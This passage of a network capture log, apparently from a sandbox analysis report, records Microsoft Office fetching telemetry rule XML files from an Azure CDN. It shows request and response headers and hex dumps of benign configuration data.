                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                      2024-12-03 07:54:51 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      18192.168.2.44977513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:53 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:53 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:53 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 3788
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                      x-ms-request-id: 481e6931-101e-0034-7113-4596ff000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075453Z-174f7845968kvnqxhC1EWRmf3g0000000sfg00000000341z
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:53 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      19192.168.2.44977813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:53 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:53 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:53 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 2980
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                      x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075453Z-174f7845968px8v7hC1EWR08ng00000015z000000000245t
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:53 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      20192.168.2.44977613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:53 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:53 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:53 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 450
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                      x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075453Z-174f7845968kdththC1EWRzvxn0000000k30000000000sn2
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:53 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      21192.168.2.44977913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:53 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:53 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:53 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 408
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                      x-ms-request-id: 2c78b3d6-001e-0017-21e0-430c3c000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075453Z-174f78459685m244hC1EWRgp2c00000015hg000000001ug8
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:53 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      22192.168.2.44978113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:55 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:55 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:55 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 415
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                      x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075455Z-174f7845968swgbqhC1EWRmnb400000015sg000000005xd8
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      23192.168.2.44978013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:55 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:55 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:55 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 474
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                      x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075455Z-174f7845968swgbqhC1EWRmnb400000015pg00000000c6dz
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:55 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      24192.168.2.44978313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:55 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:56 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:55 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 632
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                      x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075455Z-174f7845968vqt9xhC1EWRgten00000015rg000000002upk
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
